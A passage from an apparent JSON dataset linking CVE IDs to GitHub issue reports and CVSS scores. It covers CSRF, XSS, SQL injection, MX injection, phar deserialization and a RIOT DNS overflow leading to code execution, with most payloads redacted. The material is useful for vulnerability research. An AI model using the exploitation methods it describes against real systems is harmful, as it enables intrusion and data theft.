fffffffe NUMBERTAG at APITAG NUMBERTAG ffff6ce9f NUMBERTAG in __libc_start_main (main NUMBERTAG dfae <main(int, char const )>, argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe NUMBERTAG at libc APITAG NUMBERTAG dee9 in _start () ============= the poc please refer to : URLTAG",
  33159. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  33160. "severity": "MEDIUM",
  33161. "baseScore": 6.5,
  33162. "impactScore": 3.6,
  33163. "exploitabilityScore": 2.8
  33164. },
  33165. {
  33166. "CVE_ID": "CVE-2018-9846",
  33167. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6238",
  33168. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6238",
  33169. "Repo_new": "roundcube/roundcubemail",
  33170. "Issue_Created_At": "2018-04-07T13:29:13Z",
  33171. "description": "APITAG bypass in archive plugin. As explained in my last comment on NUMBERTAG which I'm going to quote): > in APITAG \"_uids\" it's taken via POST so it seems that you cannot exploit this since you'll end with APITAG checking for a token. But it's not like this. In APITAG there's a call to APITAG which get \"_uids\" again BUT with INPUT_GPC. So after line NUMBERTAG our _uids passed from GET it's injected. This by passes check_request: cause a request to APITAG it's considered a post, with empty $_POST. Which means that in versions previous to the APITAG first check for ajax requests this it's exploitable by just tricking the victim with clicking and/or a simple html page. Posterior version may be more difficult to exploit due to same origin policy. I tested this on roundcube NUMBERTAG and a simple APITAG works flawless. On more recent versions like NUMBERTAG SOP kick in but if it's somehow respected or bypassed then the same exploit works (will return a File not Found template, nonetheless code'll be executed).",
  33172. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33173. "severity": "HIGH",
  33174. "baseScore": 8.8,
  33175. "impactScore": 5.9,
  33176. "exploitabilityScore": 2.8
  33177. },
  33178. {
  33179. "CVE_ID": "CVE-2018-9846",
  33180. "Issue_Url_old": "https://github.com/roundcube/roundcubemail/issues/6229",
  33181. "Issue_Url_new": "https://github.com/roundcube/roundcubemail/issues/6229",
  33182. "Repo_new": "roundcube/roundcubemail",
  33183. "Issue_Created_At": "2018-03-28T04:09:10Z",
  33184. "description": "MX injection and type juggling vulnerabilities. Hello, I'm here to report two vulnerabilities I have found while doing research on Roundcube NUMBERTAG which are also present in your last release FILETAG . This two bugs are not exploitable in the wild, at least to my current knowledge; nonetheless fixing them should be a priority of yours because they could be chained with other minor stuff and then become exploitable in a realistic, attacker pov efficient way. Plus, with the ongoing grow of this project you may introduce features that could be used to leverage this stuff. Since the bugs are not so easy to spot, especially the mx injection, I'll now try to explain myself in the clearest way possible, the code I'll refer to it's the NUMBERTAG I'll conclude with a brief summary. MX Injection On function APITAG we have: APITAG A little bit of context: rcmail::get_uids inside the foreach cycle it's responsible to get $mbox from $uids which is passed via POST (line NUMBERTAG but anyway passing them by GET will work too); if provided with a format like ID MBOX it will split the thing and have $uids =array(ID) and $mbox =\"MBOX\"; Fine. The first IF and ELSE IF (line NUMBERTAG and NUMBERTAG set our prerequisite to exploit the bug: the archive folder has to be set, and the archive_type must be set and be different from \"folder\" that's because the function APITAG (line NUMBERTAG do his job right: will call APITAG which will call APITAG which will call APITAG which sanitize $uids. The problem lies in that else branch FILETAG line NUMBERTAG line NUMBERTAG APITAG calls fetch_headers($mbox, $uids); line NUMBERTAG APITAG calls APITAG where $folder is $mbox and $msgs is $uids line NUMBERTAG APITAG calls fetch($mailbox, $message_set, $is_uid, $query_items); APITAG it's a core function used everywhere for doing is job: fetching things. 
APITAG On line NUMBERTAG mailbox it's checked and the function returns false, so the attacker can't exploit that but, no check are done on $message_set which, still, is our user controlled input which will end in line NUMBERTAG the command to the MX server causing an MX injection. PHP Type Juggling This is far more easy to spot and straightforward, few words: on APITAG we have APITAG as you can see every check it's performed just with the == operator which is a loose not strict operator. This is not exploitable right now, and it's just a theorical bug, because you just use HTTP Paramaters which are strings, not typed but if you'll introduce JSON then this will become easily exploitable and will cause a CSRF bypass. APITAG Nonetheless as I said in my introduction you should fix this: what if I opened a \"JSON for post parameters\" request as a feature request? I hope I made myself enough clear, if you need more explanation: I am willing to help. When you fix this I'd like to write and publish a technical blog post about my findings ( the mx injection it's quite hided and nice, I think) if that's okay with you. PS: I think this issue should be private, not familiar with github if that's possible maybe we should do that.",
  33185. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33186. "severity": "HIGH",
  33187. "baseScore": 8.8,
  33188. "impactScore": 5.9,
  33189. "exploitabilityScore": 2.8
  33190. },
  33191. {
  33192. "CVE_ID": "CVE-2018-9856",
  33193. "Issue_Url_old": "https://github.com/Kotti/Kotti/issues/551",
  33194. "Issue_Url_new": "https://github.com/kotti/kotti/issues/551",
  33195. "Repo_new": "kotti/kotti",
  33196. "Issue_Created_At": "2018-03-27T09:19:53Z",
  33197. "description": "APITAG Site Request Forgery) in Kotti. There is a APITAG Site Request Forgery) security vulnerability in Kotti when you assign global roles. Detail If admin is an Administrator with full permissions, and testuser is a common user with viewer permission, admin document is the document created by admin , when admin clicks the APITAG as below, testuser will be the owner of the admin document ( testuser has full permission of admin document ). APITAG CODETAG Advice: Add an anti CSRF token in the form when generating the form, and check the token in the view function. Tested in the Kotti NUMBERTAG but Kotti NUMBERTAG is also Vulnerable. Disclosed By phoenix. EMAILTAG .cn",
  33198. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33199. "severity": "HIGH",
  33200. "baseScore": 8.8,
  33201. "impactScore": 5.9,
  33202. "exploitabilityScore": 2.8
  33203. },
  33204. {
  33205. "CVE_ID": "CVE-2018-9922",
  33206. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/16",
  33207. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/16",
  33208. "Repo_new": "idreamsoft/iCMS",
  33209. "Issue_Created_At": "2018-03-25T12:34:08Z",
  33210. "description": "Path leaks exist at the idreamsoft iCMS NUMBERTAG user registry. Path leaks exist at the idreamsoft iCMS NUMBERTAG user registry and can view the root path by constructing paylod\u3002 Paylod\uff1a POST PATHTAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Accept: application/json, text/javascript, / ; q NUMBERTAG Origin: FILETAG X Requested With: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG Connection: close APITAG APITAG APITAG FILETAG",
  33211. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  33212. "severity": "MEDIUM",
  33213. "baseScore": 5.3,
  33214. "impactScore": 1.4,
  33215. "exploitabilityScore": 3.9
  33216. },
  33217. {
  33218. "CVE_ID": "CVE-2018-9923",
  33219. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/17",
  33220. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/17",
  33221. "Repo_new": "idreamsoft/iCMS",
  33222. "Issue_Created_At": "2018-03-25T12:35:46Z",
  33223. "description": "CSRF exists in the idreamsoft iCMS NUMBERTAG article add. CSRF exists in the idreamsoft iCMS NUMBERTAG article add and can be add\u00a0 the article by constructing paylod\u3002 Paylod\uff1a APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG FILETAG",
  33224. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33225. "severity": "HIGH",
  33226. "baseScore": 8.8,
  33227. "impactScore": 5.9,
  33228. "exploitabilityScore": 2.8
  33229. },
  33230. {
  33231. "CVE_ID": "CVE-2018-9924",
  33232. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/19",
  33233. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/19",
  33234. "Repo_new": "idreamsoft/iCMS",
  33235. "Issue_Created_At": "2018-03-25T12:39:46Z",
  33236. "description": "SQL injection exists in the idreamsoft ICMS NUMBERTAG tag add. SQL injection exists in the idreamsoft ICMS NUMBERTAG tag add\u3002 POST injection\uff1a POST APITAG APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG APITAG FILETAG FILETAG",
  33237. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33238. "severity": "CRITICAL",
  33239. "baseScore": 9.8,
  33240. "impactScore": 5.9,
  33241. "exploitabilityScore": 3.9
  33242. },
  33243. {
  33244. "CVE_ID": "CVE-2018-9925",
  33245. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/18",
  33246. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/18",
  33247. "Repo_new": "idreamsoft/iCMS",
  33248. "Issue_Created_At": "2018-03-25T12:37:12Z",
  33249. "description": "XSS exists in the idreamsoft ICMS NUMBERTAG user nickname. XSS exists in the idreamsoft ICMS NUMBERTAG user nickname and can be executed by setting up the payload execution script\u3002 Payload\uff1a POST APITAG APITAG HTTP NUMBERTAG Host: APITAG Content Length NUMBERTAG Cache Control: max age NUMBERTAG Origin: FILETAG Upgrade Insecure Requests NUMBERTAG Content Type: application/x www form urlencoded User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Referer: URLTAG Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Cookie: APITAG APITAG APITAG APITAG APITAG APITAG Connection: close APITAG NUMBERTAG APITAG NUMBERTAG APITAG FILETAG FILETAG",
  33250. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  33251. "severity": "MEDIUM",
  33252. "baseScore": 5.4,
  33253. "impactScore": 2.7,
  33254. "exploitabilityScore": 2.3
  33255. },
  33256. {
  33257. "CVE_ID": "CVE-2018-9926",
  33258. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/128",
  33259. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/128",
  33260. "Repo_new": "wuzhicms/wuzhicms",
  33261. "Issue_Created_At": "2018-04-08T09:47:23Z",
  33262. "description": "There is a CSRF vulnerability that can add an administrator account. After the administrator has logged in, open the following two page poc\uff1a FILETAG ERRORTAG FILETAG ERRORTAG",
  33263. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33264. "severity": "HIGH",
  33265. "baseScore": 8.8,
  33266. "impactScore": 5.9,
  33267. "exploitabilityScore": 2.8
  33268. },
  33269. {
  33270. "CVE_ID": "CVE-2018-9985",
  33271. "Issue_Url_old": "https://github.com/learnsec6/test/issues/1",
  33272. "Issue_Url_new": "https://github.com/learnsec6/test/issues/1",
  33273. "Repo_new": "learnsec6/test",
  33274. "Issue_Created_At": "2018-04-10T16:07:15Z",
  33275. "description": "metinfo NUMBERTAG SS Vulnerability. There is an XSS Vulnerability on the front page that can attack the administrator POC: First download the latest version of metinfo from URLTAG FILETAG second: inject xss in the feedback page, and then submit it to the administrator FILETAG last: when the administrator logs in to the website and checks the feedback message, the xss will be triggered. FILETAG",
  33276. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33277. "severity": "MEDIUM",
  33278. "baseScore": 6.1,
  33279. "impactScore": 2.7,
  33280. "exploitabilityScore": 2.8
  33281. },
  33282. {
  33283. "CVE_ID": "CVE-2019-1000001",
  33284. "Issue_Url_old": "https://github.com/nilsteampassnet/TeamPass/issues/2495",
  33285. "Issue_Url_new": "https://github.com/nilsteampassnet/teampass/issues/2495",
  33286. "Repo_new": "nilsteampassnet/teampass",
  33287. "Issue_Created_At": "2018-12-07T16:17:54Z",
  33288. "description": "Shared password security questions.. Hello, For shared passwords, if I understand well, the key used to encrypt passwords is split between one part of the key in a file and the other part stored in the database, am I correct\u00a0? Am I correct if I say that a user password is not used to encrypt / decrypt shared passwords? If so, if I gain access to the teampass interface bypassing the authentication, can I see the shared secrets of a user without needing his password for deciphering purposes? Other question but related: Is it safe to back up on the same server the database (dump) and the teampass files? If someone gains access to my server with both the webserver and the database, will he be able to decipher all the shared passwords of the database?",
  33289. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33290. "severity": "CRITICAL",
  33291. "baseScore": 9.8,
  33292. "impactScore": 5.9,
  33293. "exploitabilityScore": 3.9
  33294. },
  33295. {
  33296. "CVE_ID": "CVE-2019-1000004",
  33297. "Issue_Url_old": "https://github.com/yugandhargangu/JspMyAdmin2/issues/22",
  33298. "Issue_Url_new": "https://github.com/yugandhargangu/jspmyadmin2/issues/22",
  33299. "Repo_new": "yugandhargangu/jspmyadmin2",
  33300. "Issue_Created_At": "2018-03-08T13:06:19Z",
  33301. "description": "Stored XSS in sidebar and in table_data. The sidebar and table_data are vulnerable to Stored XSS, which means an attacker could store HTML code on the database that would be rendered by the browser when viewed and potentially run malicious code. This can be fixed in the APITAG function of the APITAG and in the APITAG function of the APITAG using APITAG function on the data coming from the database.",
  33302. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33303. "severity": "MEDIUM",
  33304. "baseScore": 6.1,
  33305. "impactScore": 2.7,
  33306. "exploitabilityScore": 2.8
  33307. },
  33308. {
  33309. "CVE_ID": "CVE-2019-1000005",
  33310. "Issue_Url_old": "https://github.com/mpdf/mpdf/issues/949",
  33311. "Issue_Url_new": "https://github.com/mpdf/mpdf/issues/949",
  33312. "Repo_new": "mpdf/mpdf",
  33313. "Issue_Created_At": "2019-01-08T15:01:04Z",
  33314. "description": "Insecure PHP deserialization through phar:// wrapper.. Hello, During bug bounty hunting I met an old version of your library and decided to test it for known vulnerabilities, namely PHP deserialization through the _phar://_ wrapper that was discovered independently by MENTIONTAG and MENTIONTAG FILETAG FILETAG CTF challenge by Orange Tsai URLTAG So, after some tests, it looks like your library has a similar issue as the TCPDF URLTAG library. Method APITAG of the APITAG class passes the value of the _src_ attribute of the _img_ tag to the APITAG function, which can lead to PHP deserialization if the value contains the _phar://_ wrapper. URLTAG For proof of concept I created a class with an APITAG method (based on the APITAG deserialization chain) and used the phpggc URLTAG library to create an image which contains phar metadata. The phpggc repo also provides dozens of popular deserialization chains for popular frameworks and libraries. Source code of test class: ERRORTAG Source code of trigger script: CODETAG Video Proof Of Concept URLTAG Tested on version NUMBERTAG and NUMBERTAG latest). PHP NUMBERTAG TCPDF CVE: URLTAG TCPDF fix commit that disallows passing paths with the _phar://_ wrapper: URLTAG",
  33315. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33316. "severity": "HIGH",
  33317. "baseScore": 8.8,
  33318. "impactScore": 5.9,
  33319. "exploitabilityScore": 2.8
  33320. },
  33321. {
  33322. "CVE_ID": "CVE-2019-1000006",
  33323. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/10739",
  33324. "Issue_Url_new": "https://github.com/riot-os/riot/issues/10739",
  33325. "Repo_new": "riot-os/riot",
  33326. "Issue_Created_At": "2019-01-09T16:12:15Z",
  33327. "description": "gnrc_sock_dns: Security issues (including remote code execution). Description APITAG doesn't perform sufficient sanity checks on the DNS response it receives from the configured DNS server. Here is a non exhaustive list of issues NUMBERTAG The QDCOUNT contained in the DNS response is not verified. This causes an out of bounds buffer access in the APITAG function if QDCOUNT is set to a value larger than the buf len supplied to APITAG NUMBERTAG The RDLENGTH bounds check for the answer section is incorrect for two reasons: (a) APITAG is the first invalid address, so APITAG needs to be used as a comparison operator (b) The result of APITAG might cause a pointer overflow (especially due to the fact that addrlen is attacker controlled). If pointer overflows wrap around (undefined behaviour) this would allow an attacker to circumvent the bounds check and exposes a buffer overflow vulnerability since the attacker controlled addrlen is later used in APITAG , potentially allowing a code execution NUMBERTAG The size of the caller allocated buffer APITAG is not passed to the APITAG function at all. This makes checking whether the attacker controlled address actually fits in the buffer impossible and allows an easy buffer overflow and potential code execution. All of these are especially critical due to the fact that DNS responses can easily be spoofed, especially since all spoofing protection mechanisms of DNS were not implemented. So an attacker doesn't even need to control the configured DNS server in order to exploit this. Steps to reproduce the issue NUMBERTAG Flash an unmodified version of APITAG to your RIOT node NUMBERTAG Adjust your APITAG on your border router and add a RDNSS definition. Causing a crash Constantly send a DNS response with an excessive qdcount on the computer associated with the IP Address you configured in the radvd RDNSS definition. For example CODETAG Remote code execution This is (obviously) highly platform specific. 
We did this with APITAG . We wrote some ARM assembler code which toggles the LED and stored the machine code for it in the RDATA field of the answer section in the DNS response, thereby overflowing the addr buffer in the main stack frame. Our payload exactly fits into the stack frame of the main function and overwrites the return address of that function, jumping to the addr buffer and executing our payload. Exploit written by MENTIONTAG See: URLTAG We also working on documenting how to adapt the payload for slightly different binaries (depending on toolchain, board, \u2026 the exploit might not work because of hardcoded memory addresses). Versions RIOT Version NUMBERTAG e NUMBERTAG f NUMBERTAG ERRORTAG NUMBERTAG eb NUMBERTAG c NUMBERTAG b5e NUMBERTAG c NUMBERTAG Build environment: ERRORTAG",
  33328. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  33329. "severity": "CRITICAL",
  33330. "baseScore": 9.8,
  33331. "impactScore": 5.9,
  33332. "exploitabilityScore": 3.9
  33333. },
  33334. {
  33335. "CVE_ID": "CVE-2019-1000010",
  33336. "Issue_Url_old": "https://github.com/phpipam/phpipam/issues/2327",
  33337. "Issue_Url_new": "https://github.com/phpipam/phpipam/issues/2327",
  33338. "Repo_new": "phpipam/phpipam",
  33339. "Issue_Created_At": "2018-11-21T23:17:40Z",
  33340. "description": "XSS via FILETAG & subnet scan APITAG The line APITAG in PATHTAG and no CSRF protection at PATHTAG causes an XSS vulnerability. Poc: CODETAG Note that a valid APITAG has to be used.",
  33341. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33342. "severity": "MEDIUM",
  33343. "baseScore": 6.1,
  33344. "impactScore": 2.7,
  33345. "exploitabilityScore": 2.8
  33346. },
  33347. {
  33348. "CVE_ID": "CVE-2019-1000011",
  33349. "Issue_Url_old": "https://github.com/api-platform/core/issues/2364",
  33350. "Issue_Url_new": "https://github.com/api-platform/core/issues/2364",
  33351. "Repo_new": "api-platform/core",
  33352. "Issue_Created_At": "2018-12-04T13:37:55Z",
  33353. "description": "Graphql problem with delete mutation. Hello, I have permission problem with delete mutation. APITAG This query is valid and the book will be deleted . If I have permission to delete office , I can delete another entity. I think need check APITAG and class APITAG there URLTAG APITAG P.S. Thank you for your work. P.S.S. Sorry for my English )",
  33354. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  33355. "severity": "MEDIUM",
  33356. "baseScore": 6.5,
  33357. "impactScore": 3.6,
  33358. "exploitabilityScore": 2.8
  33359. },
  33360. {
  33361. "CVE_ID": "CVE-2019-1000022",
  33362. "Issue_Url_old": "https://github.com/ptaoussanis/sente/issues/137",
  33363. "Issue_Url_new": "https://github.com/ptaoussanis/sente/issues/137",
  33364. "Repo_new": "ptaoussanis/sente",
  33365. "Issue_Created_At": "2015-06-14T21:33:02Z",
  33366. "description": "Securing cross origin requests. From URLTAG if somebody wasn't using CSRF tokens, it seems like it would be possible for any malicious website to open up a web socket to do Bad Things. I know that CSRF tokens are highly recommended, but they're not suitable for all cases (I think). It could be good to also add CORS style protection to Sente to allow only whitelisted origins. What are your thoughts? N.B. CORS itself has no influence on websocket connections.",
  33367. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  33368. "severity": "HIGH",
  33369. "baseScore": 8.8,
  33370. "impactScore": 5.9,
  33371. "exploitabilityScore": 2.8
  33372. },
  33373. {
  33374. "CVE_ID": "CVE-2019-10010",
  33375. "Issue_Url_old": "https://github.com/thephpleague/commonmark/issues/353",
  33376. "Issue_Url_new": "https://github.com/thephpleague/commonmark/issues/353",
  33377. "Repo_new": "thephpleague/commonmark",
  33378. "Issue_Created_At": "2019-03-21T21:56:59Z",
  33379. "description": "XSS Vulnerability. An XSS vulnerability has been identified in all versions of this library prior to NUMBERTAG unreleased). We will be releasing NUMBERTAG shortly to resolve this issue. This announcement will be updated with additional information once the fix has been released.",
  33380. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33381. "severity": "MEDIUM",
  33382. "baseScore": 6.1,
  33383. "impactScore": 2.7,
  33384. "exploitabilityScore": 2.8
  33385. },
  33386. {
  33387. "CVE_ID": "CVE-2019-10015",
  33388. "Issue_Url_old": "https://github.com/baigoStudio/baigoSSO/issues/12",
  33389. "Issue_Url_new": "https://github.com/baigostudio/baigosso/issues/12",
  33390. "Repo_new": "baigostudio/baigosso",
  33391. "Issue_Created_At": "2019-03-07T02:41:00Z",
  33392. "description": "There is a Code Injection vulnerability. There is a vulnerability which allows remote attackers to execute arbitrary code. The 'BG_SITE_NAME' parameter which includes malicious code can be written into APITAG FILETAG The content of APITAG are: FILETAG FILETAG",
  33393. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  33394. "severity": "HIGH",
  33395. "baseScore": 7.2,
  33396. "impactScore": 5.9,
  33397. "exploitabilityScore": 1.2
  33398. },
  33399. {
  33400. "CVE_ID": "CVE-2019-1002100",
  33401. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/74534",
  33402. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/74534",
  33403. "Repo_new": "kubernetes/kubernetes",
  33404. "Issue_Created_At": "2019-02-25T19:39:09Z",
  33405. "description": "Placeholder. Placeholder",
  33406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  33407. "severity": "MEDIUM",
  33408. "baseScore": 6.5,
  33409. "impactScore": 3.6,
  33410. "exploitabilityScore": 2.8
  33411. },
  33412. {
  33413. "CVE_ID": "CVE-2019-10063",
  33414. "Issue_Url_old": "https://github.com/flatpak/flatpak/issues/2782",
  33415. "Issue_Url_new": "https://github.com/flatpak/flatpak/issues/2782",
  33416. "Repo_new": "flatpak/flatpak",
  33417. "Issue_Created_At": "2019-03-25T10:08:54Z",
  33418. "description": "might be vulnerable to an attack similar to CVETAG . On APITAG , MENTIONTAG wrote: > Snap just had a vulnerability where the TIOCSTI seccomp filter could be circumvented. > URLTAG > > Is bubblewrap also affected by this? bubblewrap isn't directly affected, because it doesn't try to prevent TIOCSTI, but things like Flatpak that use bubblewrap might well be vulnerable to a very similar attack. From the snapd advisory, USN NUMBERTAG The snapd default seccomp filter for strict mode snaps blocks the use of the APITAG system call when used with TIOCSTI as the second argument to the system call. Jann Horn discovered that this restriction could be circumvented on NUMBERTAG bit architectures. A malicious snap could exploit this to bypass intended access restrictions to insert characters into the terminal\u2019s input queue. and from comments at the beginning of the snapd exploit: > This bytecode performs a NUMBERTAG bit comparison; however, the syscall entry point for APITAG is defined with a NUMBERTAG bit command argument in the kernel: > > ERRORTAG > > This means that setting a bit in the high half of the command parameter will circumvent the seccomp filter while being ignored by the kernel. If Flatpak is vulnerable, it will need its own CVE ID, because CVETAG is for the snapd codebase.",
  33419. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  33420. "severity": "CRITICAL",
  33421. "baseScore": 9.0,
  33422. "impactScore": 6.0,
  33423. "exploitabilityScore": 2.2
  33424. },
  33425. {
  33426. "CVE_ID": "CVE-2019-1010003",
  33427. "Issue_Url_old": "https://github.com/leanote/leanote/issues/719",
  33428. "Issue_Url_new": "https://github.com/leanote/leanote/issues/719",
  33429. "Repo_new": "leanote/leanote",
  33430. "Issue_Created_At": "2018-01-03T12:01:28Z",
  33431. "description": "XSS in blog post. You can trigger an XSS creating a markdown note with the following payload: ERRORTAG Converting it to a blogpost and opening the link will trigger the XSS",
  33432. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33433. "severity": "MEDIUM",
  33434. "baseScore": 6.1,
  33435. "impactScore": 2.7,
  33436. "exploitabilityScore": 2.8
  33437. },
  33438. {
  33439. "CVE_ID": "CVE-2019-1010005",
  33440. "Issue_Url_old": "https://github.com/Moeditor/Moeditor/issues/156",
  33441. "Issue_Url_new": "https://github.com/moeditor/moeditor/issues/156",
  33442. "Repo_new": "moeditor/moeditor",
  33443. "Issue_Created_At": "2017-12-05T09:06:42Z",
  33444. "description": "XSS to Code execution vulnerability. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working poc that I dont want to post publicly. Please contact me at EMAILTAG",
  33445. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33446. "severity": "MEDIUM",
  33447. "baseScore": 6.1,
  33448. "impactScore": 2.7,
  33449. "exploitabilityScore": 2.8
  33450. },
  33451. {
  33452. "CVE_ID": "CVE-2019-1010005",
  33453. "Issue_Url_old": "https://github.com/zhuzhuyule/HexoEditor/issues/3",
  33454. "Issue_Url_new": "https://github.com/zhuzhuyule/hexoeditor/issues/3",
  33455. "Repo_new": "zhuzhuyule/hexoeditor",
  33456. "Issue_Created_At": "2018-01-03T13:28:12Z",
  33457. "description": "XSS to code execution vulnerability. As this project has inherited the Moeditor based on the information received here: URLTAG I would like to report XSS to code execution vulnerability in APITAG version NUMBERTAG Please do contact me at EMAILTAG for the poc.",
  33458. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33459. "severity": "MEDIUM",
  33460. "baseScore": 6.1,
  33461. "impactScore": 2.7,
  33462. "exploitabilityScore": 2.8
  33463. },
  33464. {
  33465. "CVE_ID": "CVE-2019-1010008",
  33466. "Issue_Url_old": "https://github.com/emoncms/emoncms/issues/763",
  33467. "Issue_Url_new": "https://github.com/emoncms/emoncms/issues/763",
  33468. "Repo_new": "emoncms/emoncms",
  33469. "Issue_Created_At": "2017-12-29T13:08:30Z",
  33470. "description": "Possible XSS in \"My Account\". Hello, it is more a beauty mistake than really harmful, but when logged in as any user, APITAG code can be executed through APITAG APITAG APITAG and APITAG Page\" fields in the My Account page (see appended picture). Still the input should be sanitized. It is already prevented by APITAG of the input in FILETAG . Regards, jna NUMBERTAG FILETAG",
  33471. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  33472. "severity": "MEDIUM",
  33473. "baseScore": 5.4,
  33474. "impactScore": 2.7,
  33475. "exploitabilityScore": 2.3
  33476. },
  33477. {
  33478. "CVE_ID": "CVE-2019-1010016",
  33479. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/7962",
  33480. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/7962",
  33481. "Repo_new": "dolibarr/dolibarr",
  33482. "Issue_Created_At": "2017-12-14T20:21:19Z",
  33483. "description": "Multiple XSS. Hello, Several reflected XSS can be found in version NUMBERTAG This is because the id parameter does not get properly validated to be an integer when called like this: APITAG ` Therefore php code like APITAG Will lead to reflected xss as it can be seen here: APITAG ... and many other scripts. Cheers",
  33484. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  33485. "severity": "MEDIUM",
  33486. "baseScore": 6.1,
  33487. "impactScore": 2.7,
  33488. "exploitabilityScore": 2.8
  33489. },
  33490. {
  33491. "CVE_ID": "CVE-2019-1010017",
  33492. "Issue_Url_old": "https://github.com/savon-noir/python-libnmap/issues/87",
  33493. "Issue_Url_new": "https://github.com/savon-noir/python-libnmap/issues/87",
  33494. "Repo_new": "savon-noir/python-libnmap",
  33495. "Issue_Created_At": "2018-02-01T04:25:53Z",
  33496. "description": "XML Injection APITAG attack. Issue Libnmap is vulnerable to XML Bomb attacks using the following: URLTAG Where the Issue Occurred The issue occurs within parsing of XML reports for nmap. The exact line where the vulnerable parsing occurs is given below: URLTAG Reproduction steps Run the following code: CODETAG Remediation Python does not contain any fixes for this vulnerability, but that doesn't mean it can't be fixed. Searching for the word DOCTYPE, prior to parsing, and raising an exception should patch the issue.",
  33497. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  33498. "severity": "HIGH",
  33499. "baseScore": 7.5,
  33500. "impactScore": 3.6,
